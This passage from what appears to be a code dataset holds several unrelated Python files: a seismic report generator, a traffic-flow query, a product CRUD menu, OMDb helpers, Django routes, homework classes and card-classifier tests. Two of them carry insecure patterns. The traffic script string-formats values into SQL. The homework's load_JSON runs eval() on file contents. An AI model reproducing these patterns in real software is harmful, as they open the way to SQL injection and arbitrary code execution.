(respDY)**2\n        respDY[3:] = respDY[3:] - respDY[:-3]\n        Δ_ABSy = Δ_ABSy + abs(respDY)\n        Δ_RCSCy = Δ_RCSCy + (respDY)**2\n        V_ABSy = V_ABSy + abs(np.cumsum(respAY[::-1])[::-1])\n        V_RCSCy = V_RCSCy + (np.cumsum(respAY[::-1])[::-1])**2\n\n    # Combine as 25% ABS + 75% SRSS\n    D_RCSCx = D_RCSCx**0.5\n    Δ_RCSCx = Δ_RCSCx**0.5\n    V_RCSCx = V_RCSCx**0.5\n    DDx = 0.25*D_ABSx + 0.75*D_RCSCx\n    ΔDx = 0.25*Δ_ABSx + 0.75*Δ_RCSCx\n    VDx = 0.25*V_ABSx + 
0.75*V_RCSCx\n #\n D_RCSCy = D_RCSCy**0.5\n Δ_RCSCy = Δ_RCSCy**0.5\n V_RCSCy = V_RCSCy**0.5\n DDy = 0.25*D_ABSy + 0.75*D_RCSCy\n ΔDy = 0.25*Δ_ABSy + 0.75*Δ_RCSCy\n VDy = 0.25*V_ABSy + 0.75*V_RCSCy\n \n df2 = pd.DataFrame(columns=['Nivel','VDx(ton)','VDy(ton)','UDx(cm)','UDy(cm)'])\n for i in range(int(NT/3)):\n df2 = df2.append({'Nivel':i+1, 'VDx(ton)':VDx[0::3][i]/1000,\n 'VDy(ton)':VDy[1::3][i]/1000,'UDx(cm)':DDx[0::3][i]*100,\n 'UDy(cm)':DDy[1::3][i]*100}, ignore_index=True)\n\n return DDx, ΔDx, VDx, DDy, ΔDy, VDy, df1.iloc[:ni,:], df2\n\ndef genReport(df1,df2,df3,df4,df5,texto1,texto2):\n from PIL import Image\n import glob\n #\n lista = glob.glob('./imagenes/Mod*.png')\n #\n for archivo in lista:\n im = Image.open(archivo)\n width, height = im.size\n left, top = width/6, height/6\n right, bottom = 9*width/10, 9*height/10\n im1 = im.crop((left, top, right, bottom))\n im1.save(archivo)\n #\n from docx import Document\n from docx.shared import Inches\n from docx.enum.text import WD_ALIGN_PARAGRAPH\n\n document = Document()\n title1 = document.add_heading('Informe del Análisis Sísmico', 0)\n title1.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n p = document.add_paragraph('Realizado por ')\n p.add_run('JPI Ingeniería e Innovación SAC').bold = True\n p.add_run(' para el curso ')\n p.add_run('ASEP.').italic = True\n\n document.add_paragraph('Edificio Analizado - vista 3D:')\n document.add_picture('./imagenes/Modelo_3D.png', width=Inches(5.0))\n document.add_paragraph('Edificación de Categoría Tipo C.')\n\n document.add_heading('Generalidades', level=1)\n document.add_paragraph('Metrado de Cargas', style='Intense Quote')\n\n document.add_paragraph('Para el metrado de cargas se consideró las siguientes cargas distribuidas:')\n document.add_paragraph('Carga Viva:\\t\\t\\t\\t250 kg/m2', style='List Bullet')\n document.add_paragraph('Carga de Losa:\\t\\t\\t300 kg/m2', style='List Bullet')\n document.add_paragraph('Carga de Acabados:\\t\\t100 kg/m2', style='List Bullet')\n document.add_paragraph('Carga de Tabiquería:\\t\\t150 kg/m2', style='List Bullet')\n\n document.add_picture('./imagenes/Modelo_numerico.png', width=Inches(5.0))\n f1 = document.add_paragraph('Figura 1: Modelo Numérico para el Análisis.')\n f1.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n document.add_heading('Análisis Modal', level=1)\n document.add_paragraph('Modos de Vibración', style='Intense Quote')\n #\n t1 = document.add_paragraph('\\nTabla 1: Factor de Participación de Masas.')\n t1.alignment = WD_ALIGN_PARAGRAPH.CENTER\n table1 = document.add_table(rows=df1.shape[0]+1, cols=df1.shape[1])\n table1.style = 'Light Grid Accent 1'\n for j in range(df1.shape[-1]):\n table1.cell(0,j).text = df1.columns[j]\n for i in range(df1.shape[0]):\n for j in range(df1.shape[-1]):\n table1.cell(i+1,j).text = str(df1.values[i,j].round(4))\n\n document.add_picture('./imagenes/Modo_1.png', width=Inches(5.0))\n f2 = document.add_paragraph('Figura 2: Primer modo de vibración.')\n f2.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n document.add_picture('./imagenes/Modo_2.png', width=Inches(5.0))\n f3 = document.add_paragraph('Figura 3: Segundo modo de vibración.')\n f3.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n document.add_picture('./imagenes/Modo_3.png', width=Inches(5.0))\n f4 = document.add_paragraph('Figura 4: Tercer modo de vibración.')\n f4.alignment = WD_ALIGN_PARAGRAPH.CENTER\n #\n document.add_heading('Análisis Sísmico', level=1)\n document.add_paragraph('Análisis Estático', style='Intense Quote')\n p1 = document.add_paragraph(texto1)\n p1.alignment = 
WD_ALIGN_PARAGRAPH.JUSTIFY\n #\n t2 = document.add_paragraph('Tabla 2: Fuerzas y desplazamientos del análisis estático en X.')\n t2.alignment = WD_ALIGN_PARAGRAPH.CENTER\n table3 = document.add_table(rows=df3.shape[0]+1, cols=df3.shape[1])\n table3.style = 'Light Grid Accent 1'\n for j in range(df3.shape[-1]):\n table3.cell(0,j).text = df3.columns[j]\n for i in range(df3.shape[0]):\n for j in range(df3.shape[-1]):\n table3.cell(i+1,j).text = str(df3.values[i,j].round(4))\n t3 = document.add_paragraph('\\nTabla 3: Fuerzas y desplazamientos del análisis estático en Y.')\n t3.alignment = WD_ALIGN_PARAGRAPH.CENTER\n #\n table4 = document.add_table(rows=df4.shape[0]+1, cols=df4.shape[1])\n table4.style = 'Light Grid Accent 1'\n for j in range(df4.shape[-1]):\n table4.cell(0,j).text = df4.columns[j]\n for i in range(df4.shape[0]):\n for j in range(df4.shape[-1]):\n table4.cell(i+1,j).text = str(df4.values[i,j].round(4))\n #\n document.add_paragraph('Análisis Dinámico Modal Espectral', style='Intense Quote')\n #\n document.add_paragraph('En este análisis se consideraron los siguientes parámetros sísmicos:')\n document.add_paragraph('Factor de Zona:\\t\\t\\t\\tZ = 0.45', style='List Bullet')\n document.add_paragraph('Factor de Uso:\\t\\t\\t\\tU = 1.00', style='List Bullet')\n document.add_paragraph('F. de Amplificación del Suelo:\\t\\tS = 1.00', style='List Bullet')\n document.add_paragraph('Coef. de Reducción:\\t\\t\\tRo= 8.00', style='List Bullet')\n\n document.add_picture('./imagenes/Espectro_E030.png', width=Inches(5.4))\n f5 = document.add_paragraph('Figura 5: Espectro según la norma E030.')\n f5.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n t4 = document.add_paragraph('\\nTabla 4: Respuesta Dinámica sin escalar.')\n t4.alignment = WD_ALIGN_PARAGRAPH.CENTER\n table2 = document.add_table(rows=df2.shape[0]+1, cols=df2.shape[1])\n table2.style = 'Light Grid Accent 1'\n for j in range(df2.shape[-1]):\n table2.cell(0,j).text = df2.columns[j]\n for i in range(df2.shape[0]):\n for j in range(df2.shape[-1]):\n table2.cell(i+1,j).text = str(df2.values[i,j].round(4))\n #\n p2 = document.add_paragraph(texto2)\n p2.alignment = WD_ALIGN_PARAGRAPH.JUSTIFY\n #\n t5 = document.add_paragraph('\\nTabla 5: Respuesta Dinámica Escalada.')\n t5.alignment = WD_ALIGN_PARAGRAPH.CENTER\n table5 = document.add_table(rows=df5.shape[0]+1, cols=df5.shape[1])\n table5.style = 'Light Grid Accent 1'\n for j in range(df5.shape[-1]):\n table5.cell(0,j).text = df5.columns[j]\n for i in range(df5.shape[0]):\n for j in range(df5.shape[-1]):\n table5.cell(i+1,j).text = str(df5.values[i,j].round(4))\n #\n document.add_page_break()\n document.add_heading('Resultados', level=1)\n document.add_paragraph('Distorsiones de Entrepiso', style='Intense Quote')\n document.add_picture('./imagenes/distorsion_din.png', width=Inches(5.0))\n f6 = document.add_paragraph('Figura 6: Distorsión de entrepiso del análisis dinámico.')\n f6.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n file = 'Informe de Analisis Sismico.docx'\n document.save(file)\n import os\n os.startfile('%s'%file)","repo_name":"Julian-Palacios/ASEP","sub_path":"OSP_tools.py","file_name":"OSP_tools.py","file_ext":"py","file_size_in_byte":13805,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"28731055222","text":"from jdbc.Connect import get_connection\nimport datetime\nimport pandas as pd\nimport numpy as np\nfrom jdbc.Convert_strTo_time_then_str import Convert_strTo_time_then_str\n\n\n# 
Inputs: checkpoint ID (e.g. 'HK-107'); start/end of the query window as strings ('2019-10-08 16:00:00'); lane IDs in the form [('1','2'...)]\ndef Query_ls(conn, SSID, start_time, end_time, cdbh):\n    if conn == None: conn = get_connection()  # open a database connection when conn is None\n    cr = conn.cursor()  # create a query cursor\n    # query the JGSJ (pass-through timestamps) from the checkpoint log table for the given checkpoint, window and lane group\n    query_sql = (\n            \"SELECT JGSJ FROM SJCJ_T_CLXX_LS WHERE SSID = '%s' AND CDBH IN %s AND TO_CHAR(JGSJ,'YYYY-MM-DD HH24:MI:SS') BETWEEN '%s' AND '%s'\") % (\n        SSID, cdbh[0], start_time, end_time)\n    cr.execute(query_sql)  # run the query\n    query_res = cr.fetchall()  # fetch the results, shaped like [(row1), (row2), (row3), ...]\n    query_res = [i[0] for i in query_res]  # flatten into [value1, value2, ...]\n    series_res = pd.Series(data=query_res, dtype='datetime64[ns]')  # convert the JGSJ column to a Series of dtype datetime64\n    result = pd.Series(np.ones(len(query_res)), index=series_res)  # index by the JGSJ timestamps; every value is 1 (one vehicle per entry)\n    ls_query_result = result.sort_index(ascending=True)  # sort ascending so the output is in time order\n    return ls_query_result  # return the log-query result\n\n\n# least common multiple of x and y\ndef lcm(x, y):\n    # pick the larger of the two numbers\n    if x > y:\n        greater = x\n        smaller = y\n    else:\n        greater = y\n        smaller = x\n    if smaller == 0: return 0  # return 0 when either x or y is 0\n    else:\n\n        while (True):\n            if ((greater % x == 0) and (greater % y == 0)):\n                lcm = greater\n                break\n            greater += 1\n\n        return lcm  # return the least common multiple\n\n\n# take a datetime and return it with the seconds wiped, i.e. rounded down to the whole minute\ndef Round_datetime(date_time):\n    tem = str(date_time)[:-2]+'00'\n    tem = pd.to_datetime(tem, format='%Y-%m-%d %H:%M:%S')\n    return tem  # result format: YYYY-MM-DD HH24:MI:SS\n\n\n# flow counting with a sliding time window: takes the log-query result plus an arbitrary aggregation period and window step, returns the flow counts\ndef Flow_statistical(ls_query_result, timedelta, step_length):\n    if timedelta >= step_length:  # the aggregation period must be at least the window step\n        if step_length != 0:  # non-zero step\n            low_cm = lcm(timedelta, step_length)  # LCM of the step and the period\n            loop_num = int(low_cm / step_length)  # number of counting passes\n        else: loop_num = 1  # step 0 means a single pass (no sliding)\n        str_timedelta = str(timedelta) + 'T'  # 'T' = minute frequency; see pd.resample() for other frequencies\n        resample_list = []  # holds the per-pass resampled counts\n        for i in range(loop_num):\n            sample_step_length = step_length * i  # window offset of the i-th pass\n            # base sets the origin of the resampling bins (an int, in the same unit as str_timedelta)\n            # label='right' stamps every bin with its right edge\n            resample_list.append(ls_query_result.resample(str_timedelta, base=sample_step_length, label='right').sum())\n        result_tem = pd.concat(resample_list)  # stack the per-pass counts (axis=0)\n        result_tem = result_tem.sort_index(ascending=True)  # sort ascending by timestamp\n\n        # trim the result so every bin matches a full sliding-window period (drop under-filled bins)\n        # bins are stamped with the right edge of a closed interval, so the first valid stamp is: floor(min index) + one period\n        start_period = Round_datetime(ls_query_result.index.min()) + datetime.timedelta(minutes=timedelta)\n        # likewise the last valid stamp is the max index rounded up to the next whole minute\n        end_period = Round_datetime(ls_query_result.index.max()) + datetime.timedelta(minutes=1)\n        result = result_tem[(result_tem.index >= start_period) & (result_tem.index <= end_period)]  # slice by index\n        return result  # return the flow counts\n    else:\n        print(\"Error: 时间窗步长大于统计周期\")  # the window step exceeds the period: report and skip counting\n\n\nif __name__ == '__main__':\n    starttime = datetime.datetime.now()  # program start time\n\n    conn = None\n    query_result = Query_ls(conn, 'HK-107', '2019-10-08 16:00:00', '2019-10-08 17:00:00',[('1','2')])\n    # print(result)\n    # query_result.to_csv('query_ls.csv')\n    # print(result.resample('5T', label='right').sum())\n    flow_result = Flow_statistical(query_result, 5, 2)  # 2nd arg: aggregation period in minutes; 3rd arg: sliding-window step\n    print(flow_result)\n\n    endtime = datetime.datetime.now()\n    print(\"the program runs : %d s\" % (endtime - starttime).seconds)\n","repo_name":"cf28920782519/XC","sub_path":"TrafficFlow.py","file_name":"TrafficFlow.py","file_ext":"py","file_size_in_byte":5538,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3690477468","text":"from products import *\r\nfrom query_handler import *\r\n\r\n\r\ndef adding_product(product: products, query: QueryHandler):\r\n    \"\"\"\r\n    function that adds a product, or updates it if it already exists in the database\r\n    \"\"\"\r\n    query.execute_non_fetch(\r\n        \"INSERT INTO products (barcode,products_name,quantity) VALUES(%s,%s,%s) ON DUPLICATE KEY UPDATE barcode=VALUES(barcode), products_name=VALUES(products_name),quantity=VALUES(quantity)\",\r\n        (product.barcode, product.product_name, product.quantity))\r\n    print(\"insert done\")\r\n\r\n\r\ndef delete_product(barcode: str, query: QueryHandler):\r\n    \"\"\"\r\n    function that deletes a product in the database according to the given barcode\r\n    :param barcode: products barcode (special code)\r\n    \"\"\"\r\n    products = query.execute_fetch(\"SELECT * FROM products WHERE barcode=%s\", (barcode,))\r\n    if len(products) != 0:\r\n        query.execute_non_fetch(\"DELETE FROM products WHERE barcode=%s\", (barcode,))\r\n        print(\"delete done\")\r\n    else:\r\n        print(\"Barcode doesn't exist\")\r\n\r\n\r\ndef show_all_products(query: QueryHandler):\r\n    \"\"\"\r\n    function that prints the products table in the database\r\n    \"\"\"\r\n    # print(query.execute_fetch(\"SELECT * FROM products\", ()))\r\n    products = query.execute_fetch(\"SELECT * FROM products\", ())\r\n    for item in products:\r\n        for k,v in item.items():\r\n            print(k,\":\",v)\r\n        print()\r\n\r\ndef start_Code(q):\r\n    \"\"\"\r\n    Function that inserts, updates, deletes or prints products according to the user's input\r\n    if user clicks 1 it inserts or updates the database\r\n    if user clicks 2 it deletes a product from the database\r\n    if user clicks 3 it prints the whole products table\r\n    if user clicks 4 it exits the program\r\n    \"\"\"\r\n    while True:\r\n        option = input(\"\"\"enter your choice: \r\n        Number 1: To insert or update a product.\r\n        Number 2: To delete a product.\r\n        Number 3: To print all the products\r\n        Number 4: To exit\r\n        my choice: \r\n        \"\"\")\r\n\r\n        if option == \"1\":\r\n            print(\"please enter product details,, \")\r\n            product = products(input(\"product barcode: \"), input(\"product name: \"),\r\n                               int(input(\"product quantity: \")))\r\n            adding_product(product, q)\r\n        elif option == \"2\":\r\n            print(\"please enter product barcode,, \")\r\n            barcode = input(\"product barcode: \")\r\n            delete_product(barcode, q)\r\n        elif option == \"3\":\r\n            show_all_products(q)\r\n        elif option == \"4\":\r\n            print(\"Thank you for using our program. 
Exiting...\")\r\n break\r\n else:\r\n print(\"please enter only one option for the list [1,2,3,4]\")\r\n","repo_name":"EbraFH/Python-SQL-Assessment","sub_path":"products_handle.py","file_name":"products_handle.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19505851044","text":"from datetime import datetime\r\nimport gzip\r\nimport os\r\nimport random\r\nimport shutil\r\nimport requests\r\nimport numpy as np\r\nimport urllib.request\r\n\r\ndef single_movie(ID, API_KEY):\r\n URL = \"http://www.omdbapi.com/?i={}&apikey={}\".format(ID, API_KEY)\r\n r = requests.get(URL)\r\n json = r.json()\r\n\r\n title, link, year, rating, runtime, genre, poster, desc, director = [json['Title']], [json['Poster']], [json['Year']],\\\r\n [json['Rated']], [json['Runtime']], \\\r\n [json['Genre']], [json['Poster']], [json['Plot']], [json['Director']]\r\n return title, link, year, rating, runtime, genre, poster, desc, director\r\n\r\n\r\ndef genries(query, API_KEY):\r\n \r\n URL = \"http://www.omdbapi.com/?s={}&apikey={}\".format(query, API_KEY)\r\n\r\n r = requests.get(URL)\r\n json = r.json()\r\n \r\n genre_dict = {}\r\n\r\n if json['Response'] == 'True' or json['Response'] == True:\r\n search_result = json['Search']\r\n for movie in search_result:\r\n \r\n _, _, _, _, _, genre_list, _, _, _ = single_movie(movie['imdbID'],API_KEY)\r\n\r\n for genre in genre_list[0].split(\",\"):\r\n if genre in genre_dict.keys():\r\n genre_dict[genre][0].append(movie['Poster'])\r\n genre_dict[genre][1].append(movie['Type'])\r\n genre_dict[genre][2].append(movie['imdbID'])\r\n genre_dict[genre][3].append(movie['Title'])\r\n else:\r\n genre_dict[genre] = [[],[],[],[]]\r\n gen = []\r\n for k,v in genre_dict.items():\r\n gen.append([k,np.array(v,dtype=object).T])\r\n return gen\r\n\r\ndef rand_search():\r\n searches = [\"love\", \"game\", \"biography\", \"science\", \"hate\", \"trouble\", \"care\", \"romance\", \"crime\", \"high school\"]\r\n rand = random.randint(0,9)\r\n return searches[rand]\r\n\r\ndef download():\r\n \r\n data_path = 'app/backend/data/'\r\n urllib.request.urlretrieve('https://datasets.imdbws.com/title.ratings.tsv.gz', data_path+'title.tsv.gz')\r\n\r\n with gzip.open(data_path+'title.tsv.gz', 'rb') as f:\r\n data = f.readlines()\r\n\r\n data = [f.decode(\"utf-8\").split('\\t')[0] for f in data]\r\n\r\n return data[::-1]\r\n\"\"\"\r\nif __name__ == \"__main__\":\r\n print(download())\"\"\"","repo_name":"anthony-chukwuemeka-nwachukwu/Movie-App","sub_path":"app/backend/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39576390095","text":"from django.urls import path\nfrom . 
import views\n\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Survey API\",\n default_version=\"v1.3\",\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\napp_name = \"api_service\"\n\nurlpatterns = [\n path(\"\", schema_view.with_ui(\"swagger\", cache_timeout=0), name=\"schema-swagger-ui\"),\n path(\"questions/\", views.QuestionsList.as_view()),\n path(\"questions//\", views.QuestionDetail.as_view()),\n path(\"questions//options/\", views.OptionsList.as_view()),\n path(\n \"questions//options//\",\n views.OptionDetail.as_view(),\n ),\n path(\"users/\", views.UserList.as_view()),\n path(\"users//\", views.UserDetail.as_view()),\n]\n","repo_name":"renmarin/survey","sub_path":"api_service/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19440801289","text":"import pickle, json\n\nprint('Задание 1. Реализуйте класс «Автомобиль».')\n\n\nclass ItemsCollection:\n @staticmethod\n def save_pikle(item, filename):\n with open(filename, 'wb') as f:\n pickle.dump(item, f)\n\n @staticmethod\n def load_pikle(filename):\n with open(filename, 'rb') as f:\n return pickle.load(f)\n\n @staticmethod\n def save_JSON(item, filename):\n with open(filename, 'w') as f:\n if isinstance(item, list) and all([isinstance(elm, ItemsCollection) for elm in item]):\n json_obj = []\n for elm in item:\n json_obj.append(f'{elm.__class__.__name__}(**{elm.__dict__})')\n json.dump(json_obj, f)\n elif isinstance(item, ItemsCollection):\n json.dump(f'{item.__class__.__name__}(**{item.__dict__})', f)\n\n @staticmethod\n def load_JSON(filename):\n with open(filename, 'r') as f:\n json_obj = json.load(f)\n if isinstance(json_obj, list):\n item = [eval(elm) for elm in json_obj]\n else:\n item = eval(json_obj)\n return item\n\n\nclass Car(ItemsCollection):\n VALID_KEYS = (\"model\", \"engine_volume\", \"automaker\", \"car_color\", \"year\")\n\n def __init__(self, model, year=None, car_color=None, automaker=None, engine_volume=None):\n self.model = model\n self.year = year\n self.car_color = car_color\n self.automaker = automaker\n self.engine_volume = engine_volume\n\n def set_info(self):\n self.model = input(\"Введите модель: \")\n self.year = input(\"Введите год выпуска: \")\n self.car_color = input(\"Введите цвет кузова: \")\n self.automaker = input(\"Введите производителя: \")\n self.engine_volume = input(\"Введите объем двигателя: \")\n\n def print_info(self):\n print(f'Автомобиль: {self.model}\\n\\t'\n f'объем двигателя: {self.engine_volume}\\n\\t'\n f'производитель: {self.automaker}\\n\\t'\n f'цвет кузова: {self.car_color}\\n\\t'\n f'год выпуска: {self.year};')\n\n def __setattr__(self, key, value):\n if key in self.VALID_KEYS and value != \"\":\n self.__dict__[key] = value\n elif key == \"model\":\n self.__dict__[key] = \"Undefined model\"\n elif key not in self.VALID_KEYS:\n raise AttributeError(\"Недопустимый атрибут\")\n else:\n raise ValueError(\"Значение не должно быть пустым\")\n\n def __repr__(self):\n return f\"{self.model}, {self.year}, {self.car_color}\"\n\n\na_car = Car(\"Mercedes SL350\", 2015, \"White\", \"MS\", 3500)\nb_car = Car(\"BMW 320D\", 2019, \"Black\", \"BMW\", 2000)\nc_car = Car(\"Toyota Camry\", 1998, \"Grey\", \"Toyota\", 2400)\na_car.save_pikle(a_car, 
\"a_car.pkl\")\nb_car.save_pikle(b_car, \"b_car.pkl\")\nItemsCollection.save_pikle(c_car, \"c_car.pkl\")\na2_car = ItemsCollection.load_pikle(\"a_car.pkl\")\nb2_car = Car.load_pikle(\"b_car.pkl\")\nc2_car = Car.load_pikle(\"c_car.pkl\")\nprint(a2_car, b2_car, c2_car, sep=\"\\n\")\na_car.save_JSON(a_car, \"a_car.json\")\ncars = [a_car, b_car, c_car]\nItemsCollection.save_pikle(cars, \"cars.pkl\")\npikle_cars = ItemsCollection.load_pikle(\"cars.pkl\")\nprint(\"pikle cars\")\nprint(*map(type, pikle_cars), pikle_cars)\nItemsCollection.save_JSON(cars, \"cars.json\")\ncars = ItemsCollection.load_JSON(\"cars.json\")\nprint(\"JSON cars\")\nprint(*map(type, cars), cars)\na3_car = ItemsCollection.load_JSON(\"a_car.json\")\nprint(a3_car, type(a3_car))\n\n# ==============================================================================\nprint('\\n\\nЗадание 2. Реализуйте класс «Книга».')\n\n\nclass Book(ItemsCollection):\n def __init__(self, name, author=None, year=None, publisher=None, genre=None):\n self.name = name\n self.author = author\n self.year = year\n self.publisher = publisher\n self.genre = genre\n\n def set_info(self):\n self.name = input(\"Введите название: \")\n self.author = input(\"Введите автора: \")\n self.year = input(\"Введите год издания: \")\n self.publisher = input(\"Введите издателя: \")\n self.genre = input(\"Введите жанр: \")\n\n def print_info(self):\n print(f'Книга: {self.name}\\n\\t'\n f'автор: {self.author}\\n\\t'\n f'год издания: {self.year}\\n\\t'\n f'издательство: {self.publisher}\\n\\t'\n f'жанр: {self.genre};')\n\n def __repr__(self):\n return f\"{self.name}, {self.author}, {self.year}, {self.genre}\"\n\n\na_book = Book('АРХИТЕКТУРА ЭВМ', 'Жмакин А.П.', 2010, genre=\"компьютерная литература\")\nb_book = Book('Мини-ЭВМ. Организация и программирование', 'Экхауз Р., Моррис Л.', 1983, genre=\"компьютерная литература\")\nc_book = Book('PDP-11. Архитектура и программирование', 'Фрэнк Томас', 1986, 'Радио и связь', \"компьютерная литература\")\na_book.save_pikle(a_book, \"a_book.pkl\")\na_2book = Book.load_pikle(\"a_book.pkl\")\nprint(a_2book, type(a_2book))\nprint(b_book)\nb_book.save_JSON(b_book, \"b_book.json\")\nb2_book = Book.load_JSON(\"b_book.json\")\nprint(b2_book, type(b2_book))\n\n# ==============================================================================\n\nprint('\\n\\nЗадание 3. 
Реализуйте класс «Стадион».')\n\n\nclass Stadium(ItemsCollection):\n def __init__(self, name, city=None, country=None, year=None, capacity=None):\n self.name = name\n self.city = city\n self.country = country\n self.year = year\n self.capacity = capacity\n\n def set_info(self):\n self.name = input(\"Введите название: \")\n self.city = input(\"Введите город: \")\n self.country = input(\"Введите страну: \")\n self.year = input(\"Введите год открытия: \")\n self.capacity = input(\"Введите вместимость: \")\n\n def print_info(self):\n print(f'Стадион: {self.name}\\n\\t'\n f'город: {self.city}\\n\\t'\n f'страна: {self.country}\\n\\t'\n f'год открытия: {self.year}\\n\\t'\n f'вместимость: {self.capacity};')\n\n\nstad_1 = Stadium(\"Arena\", \"Saint-Petersburg\", \"Russia\", 2010, 250000)\nstad_1.save_pikle(stad_1, \"stad1.pkl\")\nstad2 = ItemsCollection.load_pikle(\"stad1.pkl\")\nstad2.print_info()\nprint(type(stad2))\n","repo_name":"GolubinM/homeWork","sub_path":"28/HomeWork_28.py","file_name":"HomeWork_28.py","file_ext":"py","file_size_in_byte":6815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72315621993","text":"class One():\n def meth1 (self, a, b):\n print(\"Line 1 - User 1\")\n a.meth2()\n b.meth3()\n\nclass Two():\n def meth2(self):\n print(\"Line 2 - User 2\")\n\nclass Tree():\n def meth3(self):\n print(\"Line 3 - User 3\")\n\nobj1 = One()\nobj2 = Two()\nobj3 = Tree()\n\nobj1.meth1(obj2, obj3)\n\n_________________________________\nclass One():\n c = 10\n def meth (self, a, b):\n print(self.c + a + b)\n\nclass Two():\n def meth(self, a):\n self.meth = len(str(a))\n return self.meth\n\n\nobj1 = One()\nobj2 = Two()\n\nobj1.meth(45, 55)\nprint(obj2.meth(100))\n\n________________________________\nclass Base():\n def __init__ (self, variable):\n self.result = variable\n def out(self):\n self.result = self.result * 5\n print(self.result)\n\nclass SubClass(Base):\n def out(self):\n print(\"\\n---\")\n Base.out(self)\n print(\"---\")\n\nobj1 = Base(15)\nobj2 = SubClass(30)\n\nobj1.out()\nobj2.out()\n\n_____________________________________________\nclass Base:\n def __init__ (self, variable):\n self.result = variable\n def out(self):\n print(self.result)\n\nclass SubClass(Base):\n def multiple(self, z):\n self.result *= z\n print(\"---\")\n\nclass SubSubClass(SubClass):\n def devide(self, q):\n self.result /= q\n print(\"....\")\n def out(self):\n print(self.result*100)\n\nobj1 = Base(15)\nobj2 = SubClass(15)\nobj3 = SubSubClass(9)\n\nobj1.out()\nobj2.multiple(5)\nobj2.out()\nobj3.devide(3)\nobj3.multiple(2)\nobj3.out()\n","repo_name":"alisatsar/itstep","sub_path":"Python/Lessons/class/subClass.py","file_name":"subClass.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17634304890","text":"import os\nimport unittest\n\nimport ezplotly.settings as plotting_settings\nimport numpy as np\nfrom algo_ops.dependency.tester_util import clean_paths\nfrom algo_ops.ops.cv import ImageResult\nfrom algo_ops.ops.op import Op\nfrom ocr_ops.framework.op.result.ocr_result import OCRImageResult, OCRPipelineResult\nfrom ocr_ops.run_finding.interval import Interval\n\nfrom card_recognizer.classifier.core.card_prediction_result import (\n CardPredictionResult,\n CardPrediction,\n)\nfrom card_recognizer.classifier.core.word_classifier import WordClassifier\nfrom card_recognizer.reference.core.build import ReferenceBuild\n\n\nclass 
TestWordClassifier(unittest.TestCase):\n @staticmethod\n def _clean_env() -> None:\n clean_paths(\n dirs=(\"algo_ops_profile\",), files=(\"classify.txt\", \"classify_input.txt\")\n )\n\n def setUp(self) -> None:\n # suppress plotting\n plotting_settings.SUPPRESS_PLOTS = True\n\n # check that reference build has been set up\n self.master_model_pkl = ReferenceBuild.get_set_pkl_path(\n set_name=\"Brilliant Stars\"\n )\n self.assertTrue(os.path.exists(self.master_model_pkl))\n\n # setup input\n self.test_input = [\"Charizard\", \"fire\", \"burn\", \"fire\", \"spin\"]\n self._clean_env()\n\n def tearDown(self) -> None:\n self._clean_env()\n\n def test_end_to_end(self) -> None:\n \"\"\"\n Test end to end card prediction capability of WordClassifier.\n \"\"\"\n\n # init word classifier\n classifier = WordClassifier(ref_pkl_path=self.master_model_pkl)\n self.assertTrue(isinstance(classifier, Op))\n self.assertEqual(classifier.input, None)\n self.assertEqual(classifier.output, None)\n for method in (\n classifier.vis_profile,\n classifier.save_input,\n classifier.save_output,\n ):\n with self.assertRaises(ValueError):\n method()\n\n # test with test input List[str]\n output = classifier.exec(inp=[self.test_input])\n self.assertTrue(isinstance(classifier.input, list))\n self.assertTrue(isinstance(classifier.output, CardPredictionResult))\n self.assertEqual(classifier.input, [self.test_input])\n self.assertEqual(output, classifier.output)\n self.assertEqual(output.num_frames, 1)\n self.assertEqual(output.reference_set, \"Brilliant Stars\")\n self.assertEqual(output.unique_cards, [17])\n self.assertEqual(len(output), 1)\n self.assertTrue(isinstance(output[0], CardPrediction))\n self.assertEqual(output[0].card_index_in_reference, 17)\n self.assertEqual(output.input_path, None)\n\n # test vis and save input\n classifier.vis()\n classifier.vis_input()\n classifier.vis_profile()\n classifier.save_input()\n classifier.save_output()\n self.assertTrue(os.path.exists(\"classify.txt\"))\n self.assertTrue(os.path.exists(\"classify_input.txt\"))\n self.assertTrue(\n os.path.exists(os.path.join(\"algo_ops_profile\", \"classify.png\"))\n )\n\n # test input wrapped in OCRPipelineResult\n input_img = ImageResult(img=np.array([0.0]))\n ocr_image_results = [\n OCRImageResult.from_text_list(texts=self.test_input, input_img=input_img)\n ]\n ocr_pipeline_result = OCRPipelineResult(\n ocr_image_results=ocr_image_results, input_path=\"test.avi\"\n )\n output2 = classifier.exec(inp=ocr_pipeline_result)\n self.assertEqual(output2, classifier.output)\n self.assertEqual(output2.num_frames, 1)\n self.assertEqual(output2.reference_set, \"Brilliant Stars\")\n self.assertEqual(output2.unique_cards, [17])\n self.assertEqual(len(output2), 1)\n self.assertTrue(isinstance(output2[0], CardPrediction))\n self.assertEqual(output2[0].card_index_in_reference, 17)\n self.assertEqual(output2.input_path, \"test.avi\")\n\n def test_classify_multiple(self) -> None:\n \"\"\"\n Test classifying a run of length 2 of the same card.\n \"\"\"\n classifier = WordClassifier(ref_pkl_path=self.master_model_pkl)\n output = classifier.exec(inp=[self.test_input, self.test_input])\n 